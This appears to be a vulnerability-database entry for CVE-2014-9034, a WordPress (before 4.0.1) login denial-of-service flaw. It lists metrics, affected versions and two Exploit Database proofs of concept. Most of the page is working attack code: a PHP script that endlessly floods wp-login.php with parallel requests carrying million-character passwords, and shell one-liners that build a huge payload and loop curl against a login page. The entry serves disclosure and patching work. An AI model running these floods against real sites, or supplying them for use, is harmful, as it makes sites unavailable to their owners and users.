Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-19 |
Category : Data Processing Errors Weaknesses in this category are typically found in functionality that processes data. Data processing is the manipulation of input to retrieve or save information. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
5 |
|
AV:N/AC:L/Au:N/C:N/I:N/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 35413
Publication date : 2014-11-30 23h00 +00:00
Author : SECURELI.com
EDB Verified : No
<?php
echo "\nCVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability\n";
echo "Proof-of-Concept developed by
[email protected] (http://secureli.com)\n\n";
echo "usage: php wordpressed.php domain.com username numberOfThreads\n";
echo " e.g.: php wordpressed.php wordpress.org admin 50\n\n";
echo "Sending POST data (username: " . $argv[2] . "; threads: " . $argv[3] . ") to " . $argv[1];
do {
$multi = curl_multi_init();
$channels = array();
for ($x = 0; $x < $argv[3]; $x++) {
$ch = curl_init();
$postData = array(
'log' => $argv[2],
'pwd' => str_repeat("A",1000000),
'redirect_to' => $argv[1] . "/wp-admin/",
'reauth' => 1,
'testcookie' => '1',
'wp-submit' => "Log%20In");
$cookieFiles = "cookie.txt";
curl_setopt_array($ch, array(
CURLOPT_HEADER => 1,
CURLOPT_USERAGENT => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
CURLOPT_REFERER => $argv[1] . "/wp-admin/",
CURLOPT_COOKIEJAR => $cookieFiles,
CURLOPT_COOKIESESSION => true,
CURLOPT_URL => $argv[1] . '/wp-login.php',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $postData,
CURLOPT_FOLLOWLOCATION => true));
curl_multi_add_handle($multi, $ch);
$channels[$x] = $ch;
}
$active = null;
do {
$mrc = curl_multi_exec($multi, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
while ($active && $mrc == CURLM_OK) {
do {
$mrc = curl_multi_exec($multi, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
}
foreach ($channels as $channel) {
curl_multi_remove_handle($multi, $channel);
}
curl_multi_close($multi);
echo ".";
} while (1==1);
?>
Exploit Database EDB-ID : 35414
Publication date : 2014-11-30 23h00 +00:00
Author : Javer Nieto & Andres Rojas
EDB Verified : No
====================================================================
DESCRIPTION:
====================================================================
A vulnerability present in Wordpress < 4.0.1 allows an
attacker to send specially crafted requests resulting in CPU and memory
exhaustion. This may lead to the site becoming unavailable or
unresponsive (denial of service).
====================================================================
Time Line:
====================================================================
November 20, 2014 - A Wordpress security update and the security
advisory is published.
====================================================================
Proof of Concept:
====================================================================
Generate a pyaload and try with a valid user:
echo -n "name=admin&pass=" > valid_user_payload && printf "%s"
{1..1000000} >> valid_user_payload && echo -n "&op=Log
in&form_id=user_login" >> valid_user_payload
Perform a Dos with a valid user:
for i in `seq 1 150`; do (curl --data @valid_user_payload
http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep
0.25; done
====================================================================
Authors:
====================================================================
-- Javer Nieto -- http://www.behindthefirewalls.com
-- Andres Rojas -- http://www.devconsole.info
====================================================================
References:
====================================================================
* https://wordpress.org/news/2014/11/wordpress-4-0-1/
* https://www.drupal.org/SA-CORE-2014-006
*
http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
*
http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
* http://www.devconsole.info/?p=1050
Products Mentioned
Configuraton 0
Wordpress>>Wordpress >> Version To (including) 3.7.4
Wordpress>>Wordpress >> Version 3.8
Wordpress>>Wordpress >> Version 3.8.1
Wordpress>>Wordpress >> Version 3.8.2
Wordpress>>Wordpress >> Version 3.8.3
Wordpress>>Wordpress >> Version 3.8.4
Wordpress>>Wordpress >> Version 3.9
Wordpress>>Wordpress >> Version 3.9.1
Wordpress>>Wordpress >> Version 3.9.2
Wordpress>>Wordpress >> Version 4.0
References